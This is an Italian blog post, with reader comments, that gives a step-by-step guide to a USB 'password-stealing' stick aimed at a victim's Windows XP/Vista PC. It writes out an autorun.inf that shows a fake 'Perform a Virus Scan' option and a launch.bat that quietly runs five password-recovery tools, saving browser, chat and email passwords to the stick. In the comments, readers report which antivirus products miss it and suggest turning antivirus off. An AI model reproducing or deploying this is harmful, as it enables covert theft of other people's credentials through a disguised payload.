Guida: creare una penna USB ruba-password per spaventare gli amici (Windows XP/Vista)

di

Molti utenti utilizzano Windows XP/Vista. Molti utenti utilizzano software quali Internet Explorer, Firefox, Live Messenger ed Outlook. Molti utenti non si curano minimamente del fatto che tutte le password conservate in questi programmi sono facilmente rintracciabili da soggetti terzi. Molti utenti lasciano che l’autorun di dischi e dispositivi USB faccia il proprio comodo senza batter ciglio. Molti utenti credono che aver installato un antivirus – magari non aggiornato dai tempi delle guerre puniche – li protegga contro qualsiasi minaccia informatica e tendono a cliccare ovunque gli capiti.

Con questo quadretto (abbastanza desolante) di fronte a noi, possiamo dar libero sfogo alla nostra fantasia da geek e mettere in pratica un esperimento a metà strada tra il perfido e l’astuto: la creazione di una penna USB ruba-password che, una volta inserita nel PC della vittima designata, avvia una finta scansione antivirus mentre salva in alcuni file di testo tutte le parole chiave rintracciate in browser, programmi di chat e client di posta elettronica.

Ecco la procedura per crearne una. Ma ricordate, si tratta solo di un esperimento “simpatico”: nulla di particolarmente elaborato e, soprattutto, nulla che debba essere usato in contesti diversi da quello goliardico. Divertitevi!
  1. Scaricare i programmi MessenPass (recupera password da tutti i più popolari software di IM), Mail PassView (recupera password da tutti i principali client per la posta elettronica), IE Passview (recupera le password da Internet Explorer), Protected Storage PassView (recupera password da Internet Explorer, Outlook Express ed MSN Explorer) e Password Fox (recupera password da Firefox);


  2. Copiare gli eseguibili di tutti questi programmi (mspass.exe, mailpv.exe, iepv.exe, pspv.exe e passwordfox.exe) nella directory principale della penna USB da utilizzare come “ruba-password”;

  3. Aprire il Blocco Note, digitare al suo interno quanto segue e salvare il file come autorun.inf, sempre nella directory principale della penna USB:

    4. [autorun]

    open=launch.bat

    ACTION= Perform a Virus Scan

  4. Aprire il Blocco Note, digitare al suo interno quanto segue e salvare il file come launch.bat, sempre nella directory principale della penna USB:

    5. start mspass.exe /stext mspass.txt

    start mailpv.exe /stext mailpv.txt

    start iepv.exe /stext iepv.txt

    start pspv.exe /stext pspv.txt

    start passwordfox.exe /stext passwordfox.txt

  5. Inserire la penna USB nel PC dal quale s’intende rubare le password e, nella schermata dell’autorun, selezionare la voce Perform a Virus Scan;

  6. Attendere che la finta procedura di scansione antivirus termini e godersi il frutto del proprio lavoro truffaldino (le parole chiave vengono tutte conservate in dei file di testo contenuti nella penna stessa).

Via | Hacking Tips & Tricks

Foto | Flickr

Leggi anche:

Guida: creare una penna USB multi-boot per il pronto soccorso del PC Windows 7: come disabilitare Windows Defender Come rendere meno stressante AntiVir 8 Come avviare una scansione antivirus automatica all’inserimento delle penne USB nel PC Come rimuovere i virus dalle penne USB

31 commenti su “Guida: creare una penna USB ruba-password per spaventare gli amici (Windows XP/Vista)”

  1. provato e molto utile anche come password recovery…

    devo dire che avast, anche se aggiornato, non lo vede minimamente
    mentre provato su un pc con norton ne ha sgamati 2, poi non ho proseguito e ho rimosso la chiavetta

    veramente utile
    grazie

    Rispondi

  4. 2 Domande..

    Se devo mettere quei file nella directory principale significa che non devo metterle in nessuna cartella, giusto?

    Se il computer non

    Rispondi

  8. ma scusa… per PERFORM A VIRUS SCAN… la scansiione la fa come ??? e con il mio antivirus????
    POI, se io metto come action , per esempio, Procedura di recovery password, nell’autoplay mi uscirà la voce chiamata così ma farà comunque una scansione fake o recupererà solo le password in modo silenzioso??
    grazie

    Rispondi

  12. @ markgandalf: grazie a te! 😉

    @ Pirate..: puoi mettere qualsiasi voce ed uscirà quella nell’autoplay

    @ Aston: esatto

    ciao! 🙂

    Rispondi

  13. @ Pirate..: scusa ma mi era sfuggita la prima parte della tua domanda. L’antivirus non c’entra niente, quella dicitura è solo uno specchietto per le allodole.

    Rimanendo in tema, anche avira non sembra rilevare alcunché. 😉

    ciao!

    Rispondi

  18. Si nella lista era meglio indicare di chiudere l’anticirus o probabilmente i files verranno cvancellati, super grazie per la dritta.

    Rispondi

  19. Si nella lista era meglio indicare di chiudere l’anticirus o probabilmente i files verranno cvancellati, super grazie per la dritta.
    Per mettere i files nella sottocartella, penso sia sufficente cambiare i percorsi dei .exe nel file launch.bat

    Rispondi

  20. è molto interessante e utile l'unico problema che ho trovato e nell'estrarre MSPASS e PSPV al momento dell'estrazione il pc li cancellava dalla cartella

    Rispondi

  21. bello bello! funziona su seven pro 64 bit.. l'unica cosa è che non riesco ad abilitare la parte dell'autorun.inf.. mi aiutate please?

    inoltre, se creo una cartella a parte e avvio a mano funzia lo stesso?

    grazieee

    Rispondi

    • Ciao chi mi sa dire come fare? o dove postare se voi non sapete??
      ho riscontrato svariate volte il messaggio dove mi ricorda che la partizione “ os_tools (E).__Verificando effettivamente ho :__Disco locale (C:) 70GB su 102GB __HP_RECOVERY (D:) 467MB su 7,42 GB __OS_TOOLS(E:) 6,05MB su 1,55 GB__Il notebook è hp ed è installato Vista Home Basic OEMAct__Cosa serve L’ HP_RECOVERY (D:) ?__Cosa serve L’ OS_TOOLS(E:) ?__Posso velocizzare il pc?

      Rispondi

  22. Dall'articolo……

    "Molti utenti utilizzano Windows XP/Vista. Molti utenti utilizzano software quali Internet Explorer, Firefox, Live Messenger ed Outlook. Molti utenti non si curano minimamente del fatto che tutte le password conservate in questi programmi sono facilmente rintracciabili da soggetti terzi. Molti utenti lasciano che l’autorun di dischi e dispositivi USB faccia il proprio comodo senza batter ciglio. Molti utenti credono che aver installato un antivirus – magari non aggiornato dai tempi delle guerre puniche – li protegga contro qualsiasi minaccia informatica e tendono a cliccare ovunque gli capiti….. […]"

    …e che vita dimmerda ad usare quella schifezza di winzozz……

    Rispondi

  23. ho fatto tutto alla lettera ma perchè quando inserisco la chiavetta nel mio pc nn mi viene fuori nell'autoplay la voce " Perform a Virus Scan" ??____ps io sia i programmi ke l'autorun ke il launch li ho messi dentro la chiavetta dentro una cartella è un problema? o dovevo metterli semlicemente dentro la chiavetta senza creare nessuna cartella?

    Rispondi

  25. scusa, ma quando inserisco la chiavetta non mi si avvia la copia automatica, mi chiede la scansione, ma devo avviare manualmente il file .bat per ottenere le password

    Rispondi

  29. Buonasera, mi sono imbattuta nel suo blog e volevo chiedere un’informazione che non riesco a trovare nel suo utilissimo sito! Spero possa rispondermi ed aiutarmi!
    Da una chiavetta usb, è possibile risalire ad un pc? Mi spiego meglio, se su una chiavetta usb volessi mettere un video o un file, sarebbe possibile poi risalire all’origine di quel file? Cioè è possibile capire da che pc è stato preso?
    Grazie mille e scusi se mi permetto di chiedere ma nn so a chi rivolgermi!
    Federica

    Rispondi

Lascia un commento